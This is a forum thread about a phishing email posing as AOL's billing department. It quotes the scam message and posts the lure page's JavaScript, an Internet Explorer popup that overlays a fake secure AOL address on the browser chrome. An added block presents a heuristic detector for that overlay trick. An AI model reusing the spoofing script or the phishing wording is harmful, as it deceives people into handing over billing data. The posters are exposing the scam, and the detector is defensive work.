
AOL monkeys had better watch out...

Tenchiro

Attention K Mart Shoppers
Jul 19, 2002
5,407
0
New England
I got this in my spam filter, and I am not even an AOL subscriber... Definitely a scam.

Dear AOL Member,

AOL Data Security is the new program launched by America Online, Inc.

The data processing filter (type E-secure M5771) is encripted not to allow any third party access to AOL accounts. In accordance to load your information to the new system we kindly ask you to click on the link below and renew your account billing information. Having your information compared to the one we already have will avoid any errors in the system and your current AOL account.

Please use the link below to update your billing information: https://secure.aol.com/billingdept/alert/customer_confirmation.psp?siteId=billingfeatures&siteState=OrigCard

We are deeply sorry for the inconvenience that this e-mail might caused. Our duty is to secure the services we provide our clients with. We are happy to serve and protect our members!

AOL Billing Dept team.
America Online, Inc.
 

Tenchiro

After looking at the code on the page I have deleted the URLs; there is a suspicious-looking bit of JavaScript in there that I don't want anyone to get screwed by.
 

Tenchiro

Not sure what it pops up but it looks like trouble and it didn't work on Firefox.

Code:
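<script type="text/javascript">
// Popup geometry, recomputed from the browser window's current position.
var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
    // Root element differs between standards mode and quirks mode.
    var root = document[
        (document.compatMode == 'CSS1Compat') ?
        'documentElement' : 'body'
    ];
    // screenLeft/screenTop are the screen coordinates of the page's top-left
    // corner, so this is a 17px-tall strip starting 20px above the page.
    vuln_x = window.screenLeft + 68;
    vuln_y = window.screenTop - 20;
    vuln_w = root.offsetWidth - 420;
    vuln_h = 17;
    vuln_show();
}

var vuln_win;
function vuln_pop() {
    // window.createPopup() is IE-only and creates a borderless popup.
    vuln_win = window.createPopup();
    vuln_win.document.body.innerHTML = vuln_html;
    vuln_win.document.body.style.margin = 0;
    // Re-create the popup whenever it is closed.
    vuln_win.document.body.onunload = vuln_pop;
    vuln_show();
}

function vuln_show() {
    if (vuln_win)
        vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

// The popup's only content is the legitimate-looking URL, rendered as plain text.
var vuln_html = '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://secure.aol.com/billingdept/alert/customer_confirmation.psp?siteId=billingfeatures&siteState=OrigCard\x3C/div>';

if (window.createPopup) {
    vuln_calc();
    vuln_pop();
    // Keep the strip aligned if the browser window is moved or resized.
    window.setInterval(vuln_calc, 25);
} else {
}
</script>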
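Added example, not part of the original thread: a static check for the pattern in the script posted above, a borderless `createPopup()` window that shows a URL as plain text and is positioned above the page content. The function name, check labels and both sample strings are hypothetical and constructed for illustration, with a placeholder URL.

```javascript
// Added example: static heuristics for the address-bar overlay pattern.
// All names are hypothetical; SAMPLE and BENIGN are constructed inputs.
const CHECKS = [
  ['chromeless-popup', /\bcreatePopup\s*\(/],    // IE-only borderless popup
  ['above-content', /\bscreenTop\s*-\s*\d+/],    // y placed above the page area
  ['fast-reposition',                            // re-anchored every <100 ms
    /\bsetInterval\s*\(\s*[\w$.]+\s*,\s*(\d{1,2})\s*\)/],
  ['reopen-on-unload', /\.onunload\s*=/],        // popup re-created when closed
];
// A URL used as visible element text: ...>https://host/path</div>
// (the closing "<" may be written as the escape \x3C inside a JS string).
const URL_AS_TEXT = />\s*(https?:\/\/[^\s<>'"\\]+)\s*(?:<|\\x3C)\s*\//i;

function scanForAddressBarOverlay(source) {
  const findings = CHECKS.filter(([, re]) => re.test(source)).map(([id]) => id);
  const m = URL_AS_TEXT.exec(source);
  const displayedUrl = m ? m[1] : null;
  if (displayedUrl) findings.push('url-as-text');
  const has = (id) => findings.includes(id);
  // Flag only the combination: popup + placed over browser chrome + URL text.
  const suspicious =
    has('chromeless-popup') && has('above-content') && has('url-as-text');
  return { suspicious, displayedUrl, findings };
}

// Constructed sample, shaped like the posted script but with a placeholder URL.
const SAMPLE = String.raw`
var x, y, w, win;
function calc() { x = window.screenLeft + 68; y = window.screenTop - 20; w = 400; show(); }
function pop() {
  win = window.createPopup();
  win.document.body.innerHTML = html;
  win.document.body.onunload = pop;
  show();
}
function show() { if (win) win.show(x, y, w, 17); }
var html = '\x3Cdiv style="font-size: 8pt;">https://secure.example.com/billing?id=1\x3C/div>';
if (window.createPopup) { calc(); pop(); window.setInterval(calc, 25); }
`;

// Constructed benign script: a URL inside href and a slow timer, no popup.
const BENIGN = String.raw`
var tip = document.getElementById('tip');
tip.innerHTML = '<a href="https://www.example.com/help">Help</a>';
window.setInterval(refresh, 5000);
`;

console.log(scanForAddressBarOverlay(SAMPLE));
console.log(scanForAddressBarOverlay(BENIGN));
```

The `displayedUrl` field is the address the page wants the reader to see, which is worth comparing against the host the page was actually served from.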
 

binary visions

The voice of reason
Jun 13, 2002
22,162
1,261
NC
Tenchiro said:
Not sure what it pops up but it looks like trouble and it didn't work on Firefox.
Hm.. looks relatively harmless. Doesn't seem to do anything exciting except create a new popup window under that address with a few specific attributes.

That's actually a nicely set up scam - good spelling and grammar except for the one error, what appears at first to be a legitimate address... :thumb:
 
binary visions said:
Hm.. looks relatively harmless. Doesn't seem to do anything exciting except create a new popup window under that address with a few specific attributes.

That's actually a nicely set up scam - good spelling and grammar except for the one error, what appears at first to be a legitimate address... :thumb:
At least two:

"In accordance to load your information..."